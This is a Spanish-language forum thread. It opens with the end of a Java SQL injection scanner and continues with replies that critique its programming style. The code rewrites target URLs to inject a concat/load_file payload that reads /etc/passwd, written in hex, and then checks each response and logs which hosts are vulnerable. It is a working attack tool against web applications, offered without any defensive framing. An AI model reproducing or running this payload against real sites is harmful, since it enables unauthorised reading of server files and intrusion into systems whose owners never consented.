            urla = urla.replace("char(69,82,84,79,82,56,53,52)", "concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))");

            code = toma(urla);
            uno = Pattern.compile("ERTOR854");
            dos = uno.matcher(code);

            if (dos.find()) {
                System.out.println("[-] load_file : on");
                savefile(urla, "[-] load_file : on");
            } else {
                System.out.println("[-] load_file : off");
            }

        }

        private static void savefile(String nombre, String texto) throws Exception {

            String formar;

            URL h = new URL(nombre);

            formar = "logs/" + h.getHost() + ".txt";

            FileWriter writer = new FileWriter(formar, true);
            writer.write(texto + "\r\n");
            writer.close();

        }

        private static String toma(String urla) throws Exception {

            String re;

            StringBuffer conte = new StringBuffer(40);

            URL url = new URL(urla);
            URLConnection hc = url.openConnection();
            hc.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");

            BufferedReader nave = new BufferedReader(
                    new InputStreamReader(hc.getInputStream()));

            while ((re = nave.readLine()) != null) {
                conte.append(re);
            }

            nave.close();

            return conte.toString();

        }

        public static String encodehex(String text) {

    //Thanks to Katarina Majetic
    //Based on http://www.dzone.com/snippets/encode-string-hex

            byte[] z = text.getBytes();
            StringBuffer h = new StringBuffer();
            String l;
            int n;
            int a = z.length;
            int u;

            for (n = 0; n < a; n++) {
                u = z[n] & 0x000000FF;
                l = Integer.toHexString(u);
                h.append(l);
            }
            return "0x" + h.toString();
        }
    }

    //The End ?
Enero 23, 2013, 12:46:51 PM #1
La verdad que de Java lo único que tiene es la sintaxis, no usas el potencial que te ofrece....

Saludos.
Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.
Enero 23, 2013, 02:00:51 PM #2
¿ Y como uso el potencial en este programa ?
Enero 27, 2013, 04:46:22 PM #3
Nose si te habrás dado cuenta, pero para agregar alguna nueva funcionalidad tienes que modificar directamente el source. También viola muchos principios, por esa razón si alguien quiere hacer o añadir alguna funcionalidad o arreglar algo debe leerse todo el source entero.

Ese tipo de estilo de programación es muy antiguo y normalmente se usaba para hacer una tarea especifica, teniendo en cuenta que el source nunca va variar ni se le agregara alguna funcionalidad, osea que solo habrá una única versión. Aunque actualmente se sigue utilizando esa forma para creación de exploit, ya que los exploit se crean para explotar una especifica vulnerabilidad y luego de lanzarlo ya esta, no hay necesidad de lanzar otra versión del mismo exploit que siga exactamente los mismos pasos.

Y como dices, lo que tienes es un "programa" y tienes que tratar de utilizar muy buenas practicas de programación para así crear aplicaciones escalable.

Saludos.
Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.
Enero 27, 2013, 05:13:02 PM #4
no me quedo muy claro lo que me dijiste porque recien empiezo en java , pero gracias por la explicacion.
Imprimir
Ir Arriba Páginas1
Acciones del Usuario